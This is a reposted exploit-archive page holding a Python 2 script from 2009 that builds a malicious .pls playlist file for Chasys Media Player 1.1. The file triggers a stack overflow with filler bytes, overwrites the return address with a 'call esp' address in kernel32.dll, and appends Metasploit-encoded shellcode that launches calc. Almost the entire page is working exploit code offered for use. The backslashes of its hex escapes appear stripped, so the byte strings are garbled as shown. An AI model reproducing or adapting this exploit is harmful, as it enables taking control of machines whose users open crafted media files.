Chasys Media Player 1.1 (.pls) Local Stack overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Chasys Media Player 1.1 (.pls) Local Stack overflow Exploit
# Published : 2009-03-18
# Author : His0k4
# Previous Title : CDex 1.70b2 (.ogg) Local Buffer Overflow Exploit (xp/ sp3)
# Next Title : Chasys Media Player 1.1 (.pls) Stack Overflow Exploit #2

#usage: exploit.py
print "**************************************************************************"
print " Chasys Media Player(pls File) Local Stack overflow Exploitn"
print " Founder: zAx my friend :)"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Good news : The program didn't crash after running the exploit :)"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print "**************************************************************************"
         	

			
header =  "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0A"
header += "x4Ex75x6Dx62x65x72x4Fx66x45x6Ex74"
header += "x72x69x65x73x3Dx31x0Ax46x69x6Cx65"
header +=  "x31x3D"

			
buff1 = "x41" * 260

eip = "x5Dx38x82x7C" # call esp kernel32.dll


# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x30x42x30x42x30x4bx58x45x34x4ex33x4bx48x4ex37"
"x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"
"x4fx35x42x42x41x30x4bx4ex49x44x4bx58x46x53x4bx58"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x30x45x37x45x4ex4bx48"
"x4fx45x46x42x41x30x4bx4ex48x46x4bx38x4ex50x4bx34"
"x4bx38x4fx55x4ex51x41x30x4bx4ex4bx58x4ex31x4bx38"
"x41x50x4bx4ex49x48x4ex55x46x42x46x50x43x4cx41x53"
"x42x4cx46x36x4bx48x42x54x42x43x45x38x42x4cx4ax57"
"x4ex30x4bx38x42x34x4ex50x4bx58x42x57x4ex31x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x30x4bx58x42x38x42x4b"
"x42x30x42x30x42x50x4bx58x4ax56x4ex33x4fx55x41x53"
"x48x4fx42x36x48x45x49x58x4ax4fx43x58x42x4cx4bx47"
"x42x55x4ax56x42x4fx4cx48x46x30x4fx55x4ax36x4ax59"
"x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x46x41x56"
"x4ex36x43x36x42x50x5a")



exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D

try:
    out_file = open("exploit.pls",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!"
except:
    print "Error"

# www.Syue.com [2009-03-18]